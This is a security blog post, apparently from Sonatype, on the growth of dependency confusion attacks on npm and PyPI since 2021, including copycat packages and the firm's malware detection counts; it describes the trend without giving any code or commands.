Ever since the dependency confusion (or namespace confusion) technique gained widespread attention in early 2021, we are yet to see the momentum around these attacks slow down.

The extensive eight-month ethical hacking project by researcher Alex Birsan, ended up in the researcher hacking more than 35 big tech firms via this simple technique and walking away with over $130,000 in bug bounties.

The next in line was open source “vigilantes,” hijacking the technique for their cause.

Last year, a pseudonymous user RemindSupplyChainRisks polluted PyPI and npm registries with over 5,000 packages in an attempt to educate the wider community of security threats to open source repositories.

Within 72 hours of Birsan’s disclosure, Sonatype saw 300+ copycat packages—not from Birsan, flood npm. After seeing the earning potential, bug bounty hunters jumped on the wagon to capitalize on the technique too.

What may have started out as a research project by a bug bounty hunter was soon abused by threat actors, now looking to target popular companies to exfiltrate sensitive files, such as .bash_history and /etc/shadow, as previously discovered by Sonatype.

In the following weeks, we saw upwards of 10,000 copycat packages posted on npm and PyPI ecosystems—some of these posted by open-source software ‘activists’ to spread awareness of the security risks posed by this technique, whereas others were outright malicious targeting big names. 

Just last month we reported seeing more than 1,200 dependency confusion packages flooding PyPI.

And it hasn’t stopped here.

As of today, Sonatype’s automated malware detection systems have caught upwards of 63,000 packages—these include dependency confusion copycats, malicious packages (containing embedded malware), and suspicious typosquats, with the majority of these leveraging the dependency confusion technique.

Whenever Sonatype has come across malicious or suspicious packages that require immediate remediation, we have promptly notified the corresponding repository (Read more...)